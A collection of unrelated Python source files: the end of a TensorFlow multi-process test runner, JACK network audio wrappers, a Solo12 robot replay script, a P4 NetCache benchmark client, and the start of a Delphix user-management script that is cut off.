Exception: if there is an Exception propagated from any subprocess.
"""
if self._joined:
raise ValueError("MultiProcessRunner can't be joined twice.")
self._joined = True
chief = self._processes.get(('chief', 0), None)
if self._dependence_on_chief and chief:
self._join_or_terminate('chief', 0, chief, timeout)
# Give other processes a chance to exit on their own.
for p in self._processes.values():
p.join(timeout=3)
self.terminate_all()
else:
for (task_type, task_id), p in self._processes.items():
self._join_or_terminate(task_type, task_id, p, timeout)
for (task_type, task_id), p in self._processes.items():
logging.info('%s-%d exit code: %s', task_type, task_id, p.exitcode)
process_statuses = self._queue_to_list(self._process_status_queue)
if not self._all_forced_terminated and len(
process_statuses) != self._outstanding_subprocess_count:
raise RuntimeError(
'missing statuses from %d subproceses.' %
(self._outstanding_subprocess_count - len(process_statuses)))
for process_status in process_statuses:
assert isinstance(process_status, _ProcessStatusInfo)
if not process_status.is_successful:
six.reraise(*process_status.exc_info)
logging.info('Joining log reading threads.')
for thread in self._reading_threads:
thread.join()
logging.info('Joined log reading threads.')
# Clear the alarm.
signal.alarm(0)
return self._get_mpr_result(process_statuses)
def _get_mpr_result(self, process_statuses):
stdout = self._queue_to_list(self._streaming_queue)
return_values = []
for process_status in process_statuses:
if process_status.return_value is not None:
return_values.append(process_status.return_value)
return MultiProcessRunnerResult(stdout=stdout, return_value=return_values)
def terminate(self, task_type, task_id):
"""Terminates the process with `task_type` and `task_id`."""
p = self._processes.get((task_type, task_id), None)
if p is None:
raise ValueError('{}-{} does not exist'.format(task_type, task_id))
# TODO(crccw): change to use Process.terminate() as well.
self._parent_to_sub_queue.put('terminate {} {}'.format(task_type, task_id))
p.join()
def terminate_all(self, sig=None):
"""Terminates all subprocesses."""
# Use SIGKILL as default. In systems where that's unavailable such as
# windows, use SIGTERM.
sig = sig or getattr(signal, 'SIGKILL', signal.SIGTERM)
for (task_type, task_id), p in self._processes.items():
try:
os.kill(p.pid, sig)
except ProcessLookupError:
logging.info('Attempting to kill %s-%d but it does not exist.',
task_type, task_id)
self._all_forced_terminated = True
class _Process(multi_process_lib.Process):
"""A modified `multiprocessing.Process` that can set up environment variables."""
# TODO(crccw): consider moving other logics in _ProcFunc to _Process.
def __init__(self, test_env, **kwargs):
super(_Process, self).__init__(**kwargs)
self._test_env = test_env
self._actual_run = getattr(self, 'run')
self.run = self._run_with_setenv
def _run_with_setenv(self):
# We need to set environment variables before doing anything because
# setenv() is not thread-safe.
test_env = self._test_env
if test_env.grpc_fail_fast is not None:
os.environ['GRPC_FAIL_FAST'] = str(test_env.grpc_fail_fast)
_set_tf_config(test_env.task_type, test_env.task_id, test_env.cluster_spec,
test_env.rpc_layer)
return self._actual_run()
class _ProcFunc(object):
"""Represents a callable to run in a subprocess."""
@contextlib.contextmanager
def _runtime_mode(self, executing_eagerly):
if executing_eagerly:
with context.eager_mode():
yield
else:
with context.graph_mode():
yield
def _message_checking_func(self, task_type, task_id):
"""A function that regularly checks messages from parent process."""
# TODO(rchao): Remove this once parent uses SIGKILL to terminate subprocess.
while True:
try:
message = self._resources.parent_to_sub_queue.get(block=False)
# Currently the only possible message is termination.
if not message.startswith('terminate'):
raise ValueError('Unrecognized message: {}'.format(message))
if message == 'terminate {} {}'.format(task_type, task_id):
break
else:
# If the message is not targeting this process, put it back to the
# queue.
self._resources.parent_to_sub_queue.put(message)
time.sleep(1)
except Queue.Empty:
time.sleep(0.1)
self._resources.process_status_queue.put(
_ProcessStatusInfo(
is_successful=True,
exc_info=None,
return_value=None))
# `os._exit(0)` is used to more reliably terminate a subprocess.
os._exit(0) # pylint: disable=protected-access
def _close_streaming(self):
"""Close stdout, stderr and streaming pipe.
We need to explicitly close them since Tensorflow may take a while to exit,
so that the reading threads in the main process can exit more quickly.
"""
sys.stdout.flush()
sys.stderr.flush()
sys.stdout.close()
sys.stderr.close()
self._resources.streaming_pipe_w.close()
def __call__(self, resources, test_env, proc_func, args, kwargs,
use_dill_for_args):
"""The wrapper function that actually gets run in child process(es)."""
global _barrier
self._resources = resources
_barrier = self._resources.barrier
proc_func = dill.loads(proc_func)
if use_dill_for_args:
args = dill.loads(args)
kwargs = dill.loads(kwargs)
if faulthandler is not None:
faulthandler.enable()
faulthandler.register(signal.SIGTERM, chain=True)
# All logging should go to stderr to be streamed to the main process.
logging.set_stderrthreshold(logging.DEBUG)
# Assign sys.stdout and sys.stderr as duplicates of `streaming_pipe_w` so
# print() and logging.*() write directly to `streaming_pipe_w`.
# Unfortunately since we cannot prepend task_type and task_id information to
# the streamed logs we will need a thread per subprocess to distinguish
# where the piece of message is from.
os.dup2(resources.streaming_pipe_w.fileno(), sys.stdout.fileno())
os.dup2(resources.streaming_pipe_w.fileno(), sys.stderr.fileno())
pid = os.getpid()
logging.info('Subprocess with PID %d (%s, %d) is now being started.', pid,
test_env.task_type, test_env.task_id)
# The thread will be dedicated to checking messages from the parent process.
threading.Thread( # pylint: disable=unexpected-keyword-arg
target=self._message_checking_func,
args=(test_env.task_type, test_env.task_id),
daemon=True).start()
if test_env.v2_enabled:
v2_compat.enable_v2_behavior()
with self._runtime_mode(test_env.executing_eagerly):
info = _run_contained(proc_func, args, kwargs)
self._resources.process_status_queue.put(info)
# Re-raise the exception in addition to reporting it to the parent
# process, so that even if `--test_timeout` flag is set and the
# error doesn't make it to be shown in parent process before bazel's
# timeout, the log would still show what happens in this subprocess,
# instead of silently suppressing the error due to early bazel
# timeout. Raising an error in the subprocess produces stack trace in
# the log, but the program continues running.
if not info.is_successful:
six.reraise(*info.exc_info)
self._close_streaming()
class MultiProcessPoolRunner(object):
"""A utility class to start a process pool to simulate a cluster.
It's similar to MultiProcessRunner, but uses a pool of processes to avoid the
expensive initialization cost of Tensorflow.
"""
def __init__(self, cluster_spec, initializer=None):
"""Creates a multi-process pool runner.
Args:
cluster_spec: Dict for cluster spec. The following is an example of
cluster with three workers.
{"worker": ["worker0.example.com:2222",
"worker1.example.com:2222",
"worker2.example.com:2222"]}
initializer: a callable to called at the startup of worker processes.
Raises:
RuntimeError: if `multi_process_runner.test_main()` is not called.
ValueError: if there are more than one chief in the `cluster_spec`.
"""
self._cluster_spec = cluster_spec
self._initializer = initializer
self._conn = {}
self._runner = None
def __del__(self):
self._reset()
def _reset(self):
for conn in self._conn.values():
conn.close()
self._conn = {}
if self._runner is not None:
self._runner.join()
self._runner = None
def _start(self):
"""Starts the worker pool."""
# We need different arguments for different processes so we're passing a
# no-op proc_func here and use start_single_process instead.
#
# We also need to start the process pool as daemon, so that they don't block
# the program from exiting. Note that __del__ may not get called when
# there's an exception. The user may also store a pool runner in a global
# object to share across test cases
self._runner = MultiProcessRunner(
proc_func=lambda: None,
cluster_spec=self._cluster_spec,
use_dill_for_args=False,
daemon=True)
if self._initializer:
initializer = dill.dumps(self._initializer, dill.HIGHEST_PROTOCOL)
else:
initializer = None
for task_type, addresses in self._cluster_spec.items():
for task_id, _ in enumerate(addresses):
conn1, conn2 = multiprocessing.Pipe(duplex=True)
self._conn[(task_type, task_id)] = conn1
self._runner.start_single_process(
task_type,
task_id,
proc_func=_pool_runner_worker,
args=(initializer, conn2))
def run(self, proc_func, args=None, kwargs=None):
"""Runs `proc_func` with `args` and `kwargs` on all jobs.
Args:
proc_func: The function to be run.
args: Optional positional arguments to be supplied in `proc_func`.
kwargs: Optional keyword arguments to be supplied in `proc_func`.
Returns:
A list of return values.
"""
if self._runner is None:
self._start()
# Since we start the processes as daemon they're going to be killed by
# SIGTERM when the program exits. We only turn on streaming during run() to
# avoid printing the stacktrace caused by the SIGTERM.
self._runner._stream_stdout = True # pylint: disable=protected-access
try:
proc_func = dill.dumps(proc_func, dill.HIGHEST_PROTOCOL)
for conn in self._conn.values():
conn.send((proc_func, args or [], kwargs or {}))
process_statuses = []
for (task_type, task_id), conn in self._conn.items():
logging.info('Waiting for the result from %s-%d', task_type, task_id)
try:
process_statuses.append(conn.recv())
except EOFError:
# This shouldn't happen due to exceptions in proc_func. This usually
# means bugs in the runner.
self._reset()
raise RuntimeError('Unexpected EOF. Worker process may have died. '
'Please report a bug')
return_values = []
for process_status in process_statuses:
assert isinstance(process_status, _ProcessStatusInfo)
if not process_status.is_successful:
six.reraise(*process_status.exc_info)
if process_status.return_value is not None:
return_values.append(process_status.return_value)
return return_values
finally:
self._runner._stream_stdout = False # pylint: disable=protected-access
def _pool_runner_worker(initializer, conn):
"""Function that runs on the workers in a pool.
It listens for callables to run and returns the result until `conn` is closed.
It captures the exceptions during executing the callable and return it through
`conn`.
Args:
initializer: A callable to execute during startup.
conn: A multiprocessing.Connection object to listen for tasks and send
results.
"""
if initializer:
initializer = dill.loads(initializer)
initializer()
while True:
try:
proc_func, args, kwargs = conn.recv()
except EOFError:
break
proc_func = dill.loads(proc_func)
info = _run_contained(proc_func, args, kwargs)
sys.stdout.flush()
sys.stderr.flush()
conn.send(info)
def _run_contained(proc_func, args, kwargs):
"""Runs `proc_func` with `args` and `kwargs`.
The function returns _ProcessStatusInfo which captures the return value and
the exception.
Args:
proc_func: The function to be run.
args: Optional positional arguments to be supplied in `proc_func`.
kwargs: Optional keyword arguments to be supplied in `proc_func`.
Returns:
a _ProcessStatusInfo.
"""
try:
return_value = proc_func(*args, **kwargs)
is_successful = True
exc_info = None
except Exception: # pylint: disable=broad-except
return_value = None
is_successful = False
exc_info = sys.exc_info()
finally:
return _ProcessStatusInfo( # pylint: disable=lost-exception
is_successful=is_successful,
exc_info=exc_info,
return_value=return_value)
class SubprocessTimeoutError(RuntimeError):
"""An error that indicates there is at least one subprocess timing out.
When this is raised, a `MultiProcessRunnerResult` object can be retrieved by
`SubprocessTimeoutError`'s mpr_result attribute. See
`MultiProcessRunner.join()` for more information.
"""
def __init__(self, msg, mpr_result):
super(SubprocessTimeoutError, self).__init__(msg)
self.mpr_result = mpr_result
def _set_tf_config(task_type, task_id, cluster_spec, rpc_layer=None):
"""Set TF_CONFIG environment variable."""
tf_config_dict = {
'cluster': cluster_spec,
'task': {
'type': task_type,
'index': task_id,
},
}
if rpc_layer is not None:
tf_config_dict['rpc_layer'] = rpc_layer
os.environ['TF_CONFIG'] = json.dumps(tf_config_dict)
def run(proc_func,
cluster_spec,
rpc_layer=None,
max_run_time=None,
grpc_fail_fast=None,
stream_stdout=True,
list_stdout=False,
timeout=_DEFAULT_TIMEOUT_SEC,
args=None,
kwargs=None): # pylint: disable=g-doc-args
"""Runs functions in local child processes.
It is a convenience method that creates a `MultiProcessRunner` object and
invokes `start` and `join` method. Please see these methods for detailed
documentations.
Returns:
A MultiProcessRunnerResult object returned from `MultiProcessRunner.join()`.
"""
runner = MultiProcessRunner(
proc_func,
cluster_spec,
rpc_layer,
max_run_time=max_run_time,
grpc_fail_fast=grpc_fail_fast,
stream_stdout=stream_stdout,
list_stdout=list_stdout,
args=args,
kwargs=kwargs)
runner.start()
return runner.join(timeout)
# This is set by MultiProcessRunner in worker processes.
_barrier = None
def barrier():
if _barrier is None:
raise ValueError(
'barrier is not defined. It is likely because you are calling barrier()'
'in the main process. barrier() can only be called in the subprocesses.'
)
return _barrier
def test_main():
"""Main function to be called within `__main__` of a test file."""
multi_process_lib.test_main()
|
network.py | import threading
import subprocess
import socket
import time
from . import base
class NetworkInput(base.Object):
def __init__(self, name, port, buf=100, bind="0.0.0.0"):
self.name = name
self.port = port
self.buf = buf
self.bind = bind
self.out_ports = []
self.out_ports.append("%s:out_%d" % (self.name, 1))
self.out_ports.append("%s:out_%d" % (self.name, 2))
base.Object.__init__(self)
def run(self):
def target():
while self.running:
try:
self.process = subprocess.Popen(["zita-n2j", "--jname", self.name, "--buf", str(self.buf), self.bind, str(self.port)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.output, self.error = self.process.communicate()
self.status = self.process.returncode
except:
self.error = traceback.format_exc()
self.status = -1
for i in range(10):
if not self.running:
break
time.sleep(0.5)
self.thread = threading.Thread(target=target)
self.thread.start()
class NetworkOutput(base.Object):
def __init__(self, name, dst, port, nchannels=2, sampletype="float", mtu=1000):
self.name = name
self.dst = dst
self.port = port
self.nchannels = nchannels
self.sampletype = sampletype
self.mtu = mtu
self.in_ports = []
for i in range(self.nchannels):
self.in_ports.append("%s:in_%d" % (self.name, i+1))
base.Object.__init__(self)
def run(self):
def target():
while self.running:
try:
self.process = subprocess.Popen(["zita-j2n", "--mtu", str(self.mtu), "--jname", self.name, "--%s" % self.sampletype, "--chan", str(self.nchannels), self.dst, str(self.port)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.output, self.error = self.process.communicate()
self.status = self.process.returncode
except:
self.error = traceback.format_exc()
print(self.error)
self.status = -1
for i in range(10):
if not self.running:
break
time.sleep(0.5)
self.thread = threading.Thread(target=target)
self.thread.start()
|
main_solo12_replay.py | # coding: utf8
import os
import sys
sys.path.insert(0, './mpctsid')
from utils.logger import Logger
import argparse
import numpy as np
from utils.viewerClient import viewerClient, NonBlockingViewerFromRobot
import threading
SIMULATION = False
LOGGING = True
if SIMULATION:
from mpctsid.utils_mpc import PyBulletSimulator
else:
# from pynput import keyboard
from solo12 import Solo12
from utils.qualisysClient import QualisysClient
DT = 0.001
key_pressed = False
def on_press(key):
"""Wait for a specific key press on the keyboard
Args:
key (keyboard.Key): the key we want to wait for
"""
global key_pressed
try:
if key == keyboard.Key.enter:
key_pressed = True
# Stop listener
return False
except AttributeError:
print('Unknown key {0} pressed'.format(key))
def get_input():
global key_pressed
keystrk=input('Put the robot on the floor and press Enter \n')
# thread doesn't continue until key is pressed
key_pressed=True
def put_on_the_floor(device, q_init):
"""Make the robot go to the default initial position and wait for the user
to press the Enter key to start the main control loop
Args:
device (robot wrapper): a wrapper to communicate with the robot
q_init (array): the default position of the robot
"""
global key_pressed
key_pressed = False
Kp_pos = 3.
Kd_pos = 0.01
imax = 3.0
pos = np.zeros(device.nb_motors)
for motor in range(device.nb_motors):
pos[motor] = q_init[device.motorToUrdf[motor]] * device.gearRatioSigned[motor]
i=threading.Thread(target=get_input)
i.start()
while not key_pressed:
device.UpdateMeasurment()
for motor in range(device.nb_motors):
ref = Kp_pos*(pos[motor] - device.hardware.GetMotor(motor).GetPosition() -
Kd_pos*device.hardware.GetMotor(motor).GetVelocity())
ref = min(imax, max(-imax, ref))
device.hardware.GetMotor(motor).SetCurrentReference(ref)
device.SendCommand(WaitEndOfCycle=True)
print("Start the motion.")
def mcapi_playback(name_interface):
"""Main function that calibrates the robot, get it into a default waiting position then launch
the main control loop once the user has pressed the Enter key
Args:
name_interface (string): name of the interface that is used to communicate with the robot
"""
name_replay = "/home/odri/git/thomasCbrs/log_eval/test_3/06_nl/"
# name_replay = "/home/odri/git/thomasCbrs/log_eval/vmax_nl/"
# replay_q = np.loadtxt(name_replay + "_q.dat", delimiter=" ")
# replay_v = np.loadtxt(name_replay + "_v.dat", delimiter=" ")
# replay_tau = np.loadtxt(name_replay + "_tau.dat", delimiter=" ")
qtsid_full = np.load(name_replay + "qtsid.npy" , allow_pickle = True)
vtsid_full = np.load(name_replay + "vtsid.npy" , allow_pickle = True)
tau_ff = np.load(name_replay + "torques_ff.npy" , allow_pickle = True)
replay_q = qtsid_full[7:,:].transpose()
replay_v = vtsid_full[6:,:].transpose()
replay_tau = tau_ff.transpose()
N_SIMULATION = replay_q.shape[0]
# Default position after calibration
# q_init = replay_q[0, 1:]
q_init = replay_q[0, :]
if SIMULATION:
device = PyBulletSimulator()
qc = None
else:
device = Solo12(name_interface, dt=DT)
qc = QualisysClient(ip="140.93.16.160", body_id=0)
if LOGGING:
logger = Logger(device, qualisys=qc, logSize=N_SIMULATION)
# Number of motors
nb_motors = device.nb_motors
# Initiate communication with the device and calibrate encoders
if SIMULATION:
device.Init(calibrateEncoders=True, q_init=q_init, envID=0,
use_flat_plane=True, enable_pyb_GUI=True, dt=DT)
else:
device.Init(calibrateEncoders=True, q_init=q_init)
# Wait for Enter input before starting the control loop
put_on_the_floor(device, q_init)
# CONTROL LOOP ***************************************************
t = 0.0
t_max = (N_SIMULATION-1) * DT
i = 0
P = 7 * np.ones(12)
D = 0.5 * np.ones(12)
q_des = np.zeros(12)
v_des = np.zeros(12)
tau_ff = np.zeros(12)
while ((not device.hardware.IsTimeout()) and (t < t_max)):
device.UpdateMeasurment() # Retrieve data from IMU and Motion capture
# Set desired quantities for the actuators
device.SetDesiredJointPDgains(P, D)
# device.SetDesiredJointPosition(replay_q[i, 1:])
# device.SetDesiredJointVelocity(replay_v[i, 1:])
# device.SetDesiredJointTorque(replay_tau[i, 1:])
device.SetDesiredJointPosition(replay_q[i, :])
device.SetDesiredJointVelocity(replay_v[i, :])
device.SetDesiredJointTorque(replay_tau[i, :])
# Call logger
if LOGGING:
logger.sample(device, qualisys=qc)
# Send command to the robot
device.SendCommand(WaitEndOfCycle=True)
if ((device.cpt % 1000) == 0):
device.Print()
t += DT
i += 1
# DAMPING TO GET ON THE GROUND PROGRESSIVELY *********************
t = 0.0
t_max = 2.5
while ((not device.hardware.IsTimeout()) and (t < t_max)):
device.UpdateMeasurment() # Retrieve data from IMU and Motion capture
# Set desired quantities for the actuators
device.SetDesiredJointPDgains(np.zeros(12), 0.1 * np.ones(12))
device.SetDesiredJointPosition(np.zeros(12))
device.SetDesiredJointVelocity(np.zeros(12))
device.SetDesiredJointTorque(np.zeros(12))
# Send command to the robot
device.SendCommand(WaitEndOfCycle=True)
if ((device.cpt % 1000) == 0):
device.Print()
t += DT
# FINAL SHUTDOWN *************************************************
# Whatever happened we send 0 torques to the motors.
device.SetDesiredJointTorque([0]*nb_motors)
device.SendCommand(WaitEndOfCycle=True)
if device.hardware.IsTimeout():
print("Masterboard timeout detected.")
print("Either the masterboard has been shut down or there has been a connection issue with the cable/wifi.")
device.hardware.Stop() # Shut down the interface between the computer and the master board
# Save the logs of the Logger object
if LOGGING:
logger.saveAll()
print("Log saved")
if SIMULATION:
# Disconnect the PyBullet server (also close the GUI)
device.Stop()
print("End of script")
quit()
def main():
"""Main function
"""
parser = argparse.ArgumentParser(description='Playback trajectory to show the extent of solo12 workspace.')
parser.add_argument('-i',
'--interface',
required=True,
help='Name of the interface (use ifconfig in a terminal), for instance "enp1s0"')
mcapi_playback(parser.parse_args().interface)
if __name__ == "__main__":
main()
|
client.py | import socket
import struct
import time
import thread
import sys
from collections import deque
import random
import math
import threading
sys.path.append('../include')
from constants import *
from headers import *
from db import kv
path_query = "query.txt"
num_query = 1000000
zipf = 0.99
len_key = 16
len_val = 128
max_key = 1000
#Zipf
zeta = [0.0]
for i in range(1, max_key + 1):
zeta.append(zeta[i - 1] + 1 / pow(i, zipf))
field = [0] * (num_query + 1)
k = 1
for i in range(1, num_query + 1):
if (i > num_query * zeta[k] / zeta[max_key]):
k = k + 1
field[i] = k
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("base", help="base ip", type=int)
parser.add_argument("num", help="number of threads", type=int)
parser.add_argument('--nosharding', action='store_true', default=False, help='no sharding')
parser.add_argument('--badsharding', action='store_true', default=False, help='bad sharding')
args = parser.parse_args()
SERVER_A = "10.0.0.1"
SERVER_B = "10.0.0.2"
no_sharding = args.nosharding
bad_sharding = args.badsharding
def get_shard(key):
if no_sharding:
return SERVER_A
if bad_sharding:
if (key / 100) % 2 == 0:
return SERVER_A
else:
return SERVER_B
if key % 2 == 0:
return SERVER_A
else:
return SERVER_B
responses = 0
def worker(ip=None):
global responses
use_zipf = True
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind((ip, NC_PORT))
while (True):
if use_zipf:
r = random.randint(1, num_query)
key_header = field[r]
else:
key_header = random.randint(1, max_key)
key_field = struct.pack(">I", key_header)
for x in range(len_key - 4):
key_field += "\0"
rq_p = P4NetCache(type=NC_READ_REQUEST, key=key_field)
s.sendto(str(rq_p), (get_shard(key_header), NC_PORT))
packet_str, src = s.recvfrom(1024)
nc_p = P4NetCache(packet_str)
if nc_p.type != NC_READ_REPLY:
print "unexpected response"
break
key_header = struct.unpack(">I", nc_p.key[:4])[0]
if key_header < 1 or key_header > 1000:
print "invalid key %d" % key_header
break
if nc_p.value != kv[key_header]:
print "data mismatch on key %d" % key_header
print "expected:"
print kv[key_header]
break
responses += 1
nc_p.show()
from threading import Thread
for x in range(args.num):
ip = "10.0.0.%d" % (x + args.base)
print ip
t = Thread(target=worker, kwargs={"ip": ip})
t.setDaemon(True)
t.start()
last_print = time.time()
while (True):
time.sleep(1)
duration = time.time() - last_print
print "QPS = %f" % (responses / duration)
responses = 0
last_print = time.time()
|
dx_users.py | #!/usr/bin/env python
# Adam Bowen - Aug 2017
# Description:
# This script will allow you to easily manage users in Delphix
# This script currently only supports Native authentication
#
# Requirements
# pip install docopt delphixpy.v1_8_0
# The below doc follows the POSIX compliant standards and allows us to use
# this doc to also define our arguments for the script.
"""Description
Usage:
dx_users.py (--user_name <name> [(--add --password <password> --email <email_address> [--jsonly]) |--delete])
[--engine <identifier> | --all]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
dx_users.py --update --user_name <name> [ --password <password> ] [--email <email_address> ] [ --delete ] [--jsonly]
[--engine <identifier> | --all]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
dx_users.py (--list)
[--engine <identifier> | --all]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
dx_users.py -h | --help | -v | --version
Description
Examples:
dx_users.py --add --user_name dev --password delphix --email "test@something.com" --jsonly
dx_users.py --debug --config delphixpy.v1_8_0-examples/dxtools_1.conf --update --user_name dev --password not_delphix --email "test@somethingelse.com"
dx_users.py --delete --user_name dev
dx_users.py --list
Options:
--user_name <name> The name of the user
--password <password> The password of the user to be created/updated
--email <email_address> The email addres of the user to be created/updated
--jsonly Designate the user as a Jet Stream Only User
--add Add the identified user
--update Update the identified user
--delete Delete the identified user
--engine <type> Alt Identifier of Delphix engine in dxtools.conf.
--all Run against all engines.
--debug Enable debug logging
--parallel <n> Limit number of jobs to maxjob
--poll <n> The number of seconds to wait between job polls
[default: 10]
--config <path_to_file> The path to the dxtools.conf file
[default: ./dxtools.conf]
--logdir <path_to_file> The path to the logfile you want to use.
[default: ./dx_skel.log]
-h --help Show this screen.
-v --version Show version.
"""
from __future__ import print_function
import sys
from os.path import basename
from time import sleep
from time import time
from docopt import docopt
from delphixpy.v1_8_0.exceptions import HttpError
from delphixpy.v1_8_0.exceptions import JobError
from delphixpy.v1_8_0.exceptions import RequestError
from delphixpy.v1_8_0.web import authorization
from delphixpy.v1_8_0.web import job
from delphixpy.v1_8_0.web import role
from delphixpy.v1_8_0.web import user
from delphixpy.v1_8_0.web.vo import Authorization
from delphixpy.v1_8_0.web.vo import CredentialUpdateParameters
from delphixpy.v1_8_0.web.vo import PasswordCredential
from delphixpy.v1_8_0.web.vo import User
from lib.DlpxException import DlpxException
from lib.DxLogging import logging_est
from lib.DxLogging import print_debug
from lib.DxLogging import print_exception
from lib.DxLogging import print_info
from lib.GetReferences import find_all_objects
from lib.GetReferences import find_obj_by_name
from lib.GetSession import GetSession
VERSION = "v.0.0.004"
def add_user(user_name, user_password, user_email, jsonly=None):
"""
This function adds the user
"""
user_obj = User()
user_obj.name = user_name
user_obj.email_address = user_email
user_obj.credential = PasswordCredential()
user_obj.credential.password = user_password
try:
user.create(dx_session_obj.server_session, user_obj)
print("Attempting to create {}".format(user_name))
except (DlpxException, RequestError) as e:
print_exception(
"\nERROR: Creating the user {} "
"encountered an error:\n{}".format(user_name, e)
)
sys.exit(1)
js_only(user_name, jsonly)
def js_only(user_name, jsonly=None):
"""
Switch the user to/from a jsonly user
"""
user_obj = find_obj_by_name(dx_session_obj.server_session, user, user_name)
role_obj = find_obj_by_name(dx_session_obj.server_session, role, "Jet Stream User")
if jsonly:
authorization_obj = Authorization()
authorization_obj.role = role_obj.reference
authorization_obj.target = user_obj.reference
authorization_obj.user = user_obj.reference
authorization.create(dx_session_obj.server_session, authorization_obj)
else:
auth_name = (
"("
+ user_obj.reference
+ ", "
+ role_obj.reference
+ ", "
+ user_obj.reference
+ ")"
)
authorization.delete(
dx_session_obj.server_session,
find_obj_by_name(
dx_session_obj.server_session, authorization, auth_name
).reference,
)
def update_user(user_name, user_password=None, user_email=None, jsonly=None):
"""
This function updates the user
"""
if user_email:
updated_user_obj = User()
updated_user_obj.email_address = user_email
try:
user.update(
dx_session_obj.server_session,
find_obj_by_name(
dx_session_obj.server_session, user, user_name
).reference,
updated_user_obj,
)
print("Attempting to update {}".format(user_name))
except (DlpxException, RequestError) as e:
print_exception(
"\nERROR: Updating the user {} "
"encountered an error:\n{}".format(user_name, e)
)
sys.exit(1)
if user_password:
new_password_obj = CredentialUpdateParameters()
new_password_obj.new_credential = PasswordCredential()
new_password_obj.new_credential.password = user_password
try:
user.update_credential(
dx_session_obj.server_session,
find_obj_by_name(
dx_session_obj.server_session, user, user_name
).reference,
new_password_obj,
)
print("Attempting to update {} password".format(user_name))
except (DlpxException, RequestError) as e:
print_exception(
"\nERROR: Updating the user {} password "
"encountered an error:\n{}".format(user_name, e)
)
sys.exit(1)
js_only(user_name, jsonly)
def delete_user(user_name):
"""
This function adds the user
"""
user_obj = find_obj_by_name(dx_session_obj.server_session, user, user_name)
try:
user.delete(dx_session_obj.server_session, user_obj.reference)
print("Attempting to delete {}".format(user_name))
except (DlpxException, RequestError) as e:
print_exception(
"\nERROR: Deleting the user {} "
"encountered an error:\n{}".format(user_name, e)
)
sys.exit(1)
def list_users():
"""
This function lists all users
"""
user_list = find_all_objects(dx_session_obj.server_session, user)
for user_obj in user_list:
print("User: {}".format(user_obj.name))
def run_async(func):
"""
http://code.activestate.com/recipes/576684-simple-threading-decorator/
run_async(func)
function decorator, intended to make "func" run in a separate
thread (asynchronously).
Returns the created Thread object
E.g.:
@run_async
def task1():
do_something
@run_async
def task2():
do_something_too
t1 = task1()
t2 = task2()
...
t1.join()
t2.join()
"""
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target=func, args=args, kwargs=kwargs)
func_hl.start()
return func_hl
return async_func
@run_async
def main_workflow(engine):
"""
This function actually runs the jobs.
Use the @run_async decorator to run this function asynchronously.
This allows us to run against multiple Delphix Engine simultaneously
engine: Dictionary of engines
"""
try:
# Setup the connection to the Delphix Engine
dx_session_obj.serversess(
engine["ip_address"], engine["username"], engine["password"]
)
except DlpxException as e:
print_exception(
"\nERROR: Engine {} encountered an error while"
"{}:\n{}\n".format(engine["hostname"], arguments["--target"], e)
)
sys.exit(1)
thingstodo = ["thingtodo"]
try:
with dx_session_obj.job_mode(single_thread):
while len(dx_session_obj.jobs) > 0 or len(thingstodo) > 0:
if len(thingstodo) > 0:
if arguments["--add"]:
add_user(
arguments["--user_name"],
arguments["--password"],
arguments["--email"],
arguments["--jsonly"],
)
elif arguments["--update"]:
update_user(
arguments["--user_name"],
arguments["--password"],
arguments["--email"],
arguments["--jsonly"],
)
elif arguments["--delete"]:
delete_user(arguments["--user_name"])
elif arguments["--list"]:
list_users()
thingstodo.pop()
# get all the jobs, then inspect them
i = 0
for j in dx_session_obj.jobs.keys():
job_obj = job.get(
dx_session_obj.server_session, dx_session_obj.jobs[j]
)
print_debug(job_obj)
print_info(
"{}: User: {}".format(engine["hostname"], job_obj.job_state)
)
if job_obj.job_state in ["CANCELED", "COMPLETED", "FAILED"]:
# If the job is in a non-running state, remove it
# from the
# running jobs list.
del dx_session_obj.jobs[j]
elif job_obj.job_state in "RUNNING":
# If the job is in a running state, increment the
# running job count.
i += 1
print_info("{}: {:d} jobs running.".format(engine["hostname"], i))
# If we have running jobs, pause before repeating the
# checks.
if len(dx_session_obj.jobs) > 0:
sleep(float(arguments["--poll"]))
except (HttpError, RequestError, JobError, DlpxException) as e:
print_exception("ERROR: Could not complete user " "operation: {}".format(e))
def run_job():
"""
This function runs the main_workflow aynchronously against all the servers
specified
"""
# Create an empty list to store threads we create.
threads = []
engine = None
# If the --all argument was given, run against every engine in dxtools.conf
if arguments["--all"]:
print_info("Executing against all Delphix Engines in the dxtools.conf")
try:
# For each server in the dxtools.conf...
for delphix_engine in dx_session_obj.dlpx_engines:
engine = dx_session_obj[delphix_engine]
# Create a new thread and add it to the list.
threads.append(main_workflow(engine))
except DlpxException as e:
print("Error encountered in run_job():\n{}".format(e))
sys.exit(1)
elif arguments["--all"] is False:
# Else if the --engine argument was given, test to see if the engine
# exists in dxtools.conf
if arguments["--engine"]:
try:
engine = dx_session_obj.dlpx_engines[arguments["--engine"]]
print_info(
"Executing against Delphix Engine: {}\n".format(
(arguments["--engine"])
)
)
except (DlpxException, RequestError, KeyError) as e:
raise DlpxException(
"\nERROR: Delphix Engine {} cannot be "
"found in {}. Please check your value "
"and try again. Exiting.\n".format(
arguments["--engine"], config_file_path
)
)
else:
# Else search for a default engine in the dxtools.conf
for delphix_engine in dx_session_obj.dlpx_engines:
if dx_session_obj.dlpx_engines[delphix_engine]["default"] == "true":
engine = dx_session_obj.dlpx_engines[delphix_engine]
print_info(
"Executing against the default Delphix Engine "
"in the dxtools.conf: {}".format(
dx_session_obj.dlpx_engines[delphix_engine]["hostname"]
)
)
break
if engine == None:
raise DlpxException("\nERROR: No default engine found. Exiting")
# run the job against the engine
threads.append(main_workflow(engine))
# For each thread in the list...
for each in threads:
# join them back together so that we wait for all threads to complete
# before moving on
each.join()
def time_elapsed():
"""
This function calculates the time elapsed since the beginning of the script.
Call this anywhere you want to note the progress in terms of time
"""
# elapsed_minutes = round((time() - time_start)/60, +1)
# return elapsed_minutes
return round((time() - time_start) / 60, +1)
def main(arguments):
# We want to be able to call on these variables anywhere in the script.
global single_thread
global usebackup
global time_start
global config_file_path
global dx_session_obj
global debug
if arguments["--debug"]:
debug = True
try:
